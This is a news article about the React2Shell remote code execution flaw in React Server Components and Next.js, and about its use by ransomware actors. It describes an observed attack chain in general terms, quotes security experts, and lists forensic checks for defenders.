Attackers have upped the ante in their exploits of a recently-disclosed maximum severity vulnerability in React Server Components (RSC), Next.js, and related frameworks.
Financially-motivated attackers have found a way to use the flaw, dubbed React2Shell (CVE-2025-55182), to execute arbitrary code on vulnerable servers through a single malicious HTTP request. This allows them to quickly and easily gain access to a corporate network and deploy ransomware, according to researchers at cybersecurity company S-RM and the Microsoft Defender Security Research Team.
Attackers initially exploited the vulnerability to introduce backdoor malware and crypto miners; this new method represents an escalation, and experts say it reveals a fundamental security flaw in front end development.
“For too long, we’ve treated front end development as low end, low risk work,” said David Shipley of Beauceron Security. “This is to front end of applications what Log4j was to the back end, a massive opportunity for attackers.”
How attackers easily get ‘highly privileged’ access
React is widely used in enterprise environments, with Microsoft researchers identifying “tens of thousands of distinct devices across several thousand organizations” running React or React-based applications.
React2Shell is a pre-authentication remote code execution (RCE) vulnerability affecting React Server Components (RSC), the open-source framework Next.js, and other related frameworks. It has been rated a 10 on the Common Vulnerability Scoring System (CVSS) because it is easy to exploit, puts numerous exposed systems at risk, and is highly susceptible to automated attacks since it doesn’t require authentication to execute.
The vulnerability specifically impacts the Flight protocol, a core feature in the React development library and Next.js. RSC contains packages, frameworks, and bundlers that allow React apps to run parts of their logic on the server rather than in the browser.
Flight allows server and client to communicate; when the client requests data, the server receives and parses a payload, executes server-side logic, and returns a human-readable software package.
With the React2Shell vulnerability, impacted RSCs fail to validate incoming payloads, allowing threat actors to inject malicious components that React identifies as legitimate. Attackers can send HTTP requests to trick the server into running compromised code, potentially giving them “highly privileged” access to unpatched systems, according to the S-RM researchers.
According to initial reporting on React2Shell, nation-state actors began exploiting the vulnerability within hours of public disclosure. While early impact was limited to the installation of persistent backdoors into networks and crypto currency mining, React2Shell is now being used as the initial access vector in a ransomware attack.
S-RM notes that it is likely being used by “less sophisticated actors” targeting public-facing web servers.
The Microsoft researchers warn of the dangers of this vulnerability: It can be exploited with just one HTTP request; default configurations are vulnerable, meaning there’s no special setup and attackers don’t have to wait for user mistakes; exploitation doesn’t require authentication because it occurs pre-authentication; and proof-of-concept exploits show near-100% reliability.
“For all the over-talk on zero trust, here’s a great example of where it would’ve been useful,” said Beauceron’s Shipley. “Way too much trust and access was built into the React model. And attackers figured out how to exploit it.”
What to look for
In an attack tracked by S-RM, immediately after the threat actor gained access to a targeted company’s network, they ran a hidden PowerShell command, establishing command and control (C2) by downloading a Cobalt Strike PowerShell stager, a tactic regularly used by red teamers, and installing a beacon to allow them to communicate with their external servers. They then disabled real-time protection in Windows Defender Antivirus.
The ransomware binary was dropped and executed “within less than one minute of initial access,” the S-RM researchers report. The attackers modified encrypted files, left recovery notes, created text files that included the target’s public IP address, and cleared event logs and backup snapshots.
The researchers noted that they did not observe lateral movement to other systems or attempts to steal data. The compromised server was taken down the day after it was discovered.
S-RM advises enterprises using RSC to verify that it is a fully-patched version; however, React has warned that even initially released patches (versions 19.0.2, 19.1.3, and 19.2.2) are vulnerable.
Beyond patching, organizations should perform forensic reviews to check for:
Unusual outbound connections that could indicate C2 was executed;
Disabling of antivirus and endpoint protection, or log clearing or tampering;
Unusual spikes in resource use, which could indicate crypto miners;
Windows event logs or endpoint detection and response (EDR) telemetry indicating attackers executed files in memory from binaries related to Node or React.
Indicators of compromise (IOC) detailed in the advisory, both host-based and network-based.
Front end is no longer low-risk
This vulnerability reveals a fundamental gap in the development environment that has largely been overlooked, experts say.
“There is a dangerous comforting lie we tell ourselves in web development: ‘The frontend is safe.’ It isn’t,” notes web engineer Louis Phang. He called this a “logic error in the way modern servers talk to clients,” that turns a standard web request into a weapon. It is the result of developers focusing on reliability, scalability, and maintainability, rather than security.
For years, all that happened when a front end developer made a mistake was that a button that looked wrong, a layout was broken, or, in a worst-case scenario, Cross-Site Scripting (XSS), which allows attackers to inject malicious scripts into web pages, was possible, Phang said. With React rendering on the server, front end code has privileged access, and vulnerabilities serve as a backdoor into databases, keys, and data.
“React2Shell signifies the end of the front end developer as a low-risk role,” Phang contended.
Beauceron’s Shipley agreed, noting that the need for server-side heavy lifting changed the risk, but the tech stack didn’t respond accordingly.
“First, we had confusion about whether it was severe or not, then some were downplaying how much exploitation would happen, and now we’re in a feeding frenzy,” he said.
It’s concerning how long it’s taking to rouse the technology environment to deal with this threat; it could ultimately be a side effect of cuts to security teams and budgets and developer burnout, he noted.
“This is a concerning trend heading into 2026, which will be even more intense for zero days thanks to AI,” Shipley predicted.
This article originally appeared on InfoWorld.
No Responses